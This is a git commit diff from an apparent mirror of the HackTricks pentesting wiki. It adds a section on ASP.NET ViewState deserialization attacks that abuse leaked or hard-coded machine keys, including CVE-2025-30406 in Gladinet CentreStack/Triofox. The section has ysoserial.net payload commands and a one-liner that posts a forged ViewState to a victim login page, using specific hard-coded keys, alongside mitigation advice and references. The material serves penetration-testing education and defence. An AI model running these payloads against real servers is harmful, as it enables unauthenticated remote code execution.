mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Add content from: Research Update: Enhanced src/pentesting-web/deserialization...
This commit is contained in:
HackTricks News Bot
parent
0f0e4e0900
commit
1018f5af23
@ -237,8 +237,56 @@ curl "http://victim/page.aspx?__VIEWSTATE=<PAYLOAD>"
|
|||||||
|
|
||||||
This **key-exfiltration primitive** was mass-exploited against on-prem SharePoint servers in 2025 ("ToolShell" – CVE-2025-53770/53771), but it is applicable to any ASP.NET application where an attacker can run server-side code.
|
This **key-exfiltration primitive** was mass-exploited against on-prem SharePoint servers in 2025 ("ToolShell" – CVE-2025-53770/53771), but it is applicable to any ASP.NET application where an attacker can run server-side code.
|
||||||
|
|
||||||
|
## 2024-2025 Real-world Exploitation Scenarios and Hard-coded Machine Keys
|
||||||
|
|
||||||
|
### Microsoft “publicly disclosed machine keys” wave (Dec 2024 – Feb 2025)
|
||||||
|
Microsoft Threat Intelligence reported mass exploitation of ASP.NET sites where the *machineKey* had previously been leaked on public sources (GitHub gists, blog posts, paste sites). Adversaries enumerated these keys and generated valid `__VIEWSTATE` gadgets with the newer `ysoserial.net` 1.41 `--minify` and `--islegacy` flags to evade WAF length limits:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \
|
||||||
|
--validationkey=<LEAKED_VALIDATION_KEY> --validationalg=SHA1 \
|
||||||
|
--decryptionkey=<LEAKED_DECRYPTION_KEY> --decryptionalg=AES \
|
||||||
|
--generator=<VIEWSTATEGEN> --minify
|
||||||
|
```
|
||||||
|
|
||||||
|
Rotating static keys or switching to *AutoGenerate* keys in Web .config (`<machineKey ... validationKey="AutoGenerate" decryptionKey="AutoGenerate" />`) mitigates this class of attacks. {{#ref}}
|
||||||
|
|
||||||
|
{{#endref}}
|
||||||
|
|
||||||
|
### CVE-2025-30406 – Gladinet CentreStack / Triofox hard-coded keys
|
||||||
|
Kudelski Security uncovered that multiple CentreStack / Triofox releases shipped with identical `machineKey` values, enabling unauthenticated remote code execution through ViewState forgery (CVE-2025-30406).
|
||||||
|
|
||||||
|
One-liner exploit:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \
|
||||||
|
--validationkey=ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C \
|
||||||
|
--validationalg=SHA1 \
|
||||||
|
--decryptionkey=1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7 \
|
||||||
|
--decryptionalg=AES --generator=24D41AAB --minify \
|
||||||
|
| curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx
|
||||||
|
```
|
||||||
|
|
||||||
|
Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or replace the keys immediately. {{#ref}}
|
||||||
|
|
||||||
|
|
||||||
|
{{#endref}}
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
- [Exploiting ViewState deserialization using Blacklist3r and YSoSerial.NET](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
|
||||||
|
- [Deep dive into .NET ViewState deserialization and its exploitation](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
|
||||||
|
- [Exploiting deserialisation in ASP.NET via ViewState (Soroush Dalili, 2019)](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
|
||||||
|
- [Introducing badsecrets – fast machineKey discovery](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
|
||||||
|
- [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/)
|
||||||
|
- [Microsoft Security – Code injection attacks abusing publicly disclosed ASP.NET machine keys (Feb 6 2025)](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/)
|
||||||
|
- [Kudelski Security advisory – Gladinet CentreStack / Triofox RCE CVE-2025-30406 (Apr 16 2025)](https://research.kudelskisecurity.com/2025/04/16/gladinet-centrestack-and-gladinet-triofox-critical-rce-cve-2025-30406/)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
- [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
|
- [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
|
||||||
- [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
|
- [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
|
||||||
- [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
|
- [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
|
||||||
@ -250,4 +298,3 @@ This **key-exfiltration primitive** was mass-exploited against on-prem SharePoin
|
|||||||
{{#include ../../banners/hacktricks-training.md}}
|
{{#include ../../banners/hacktricks-training.md}}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user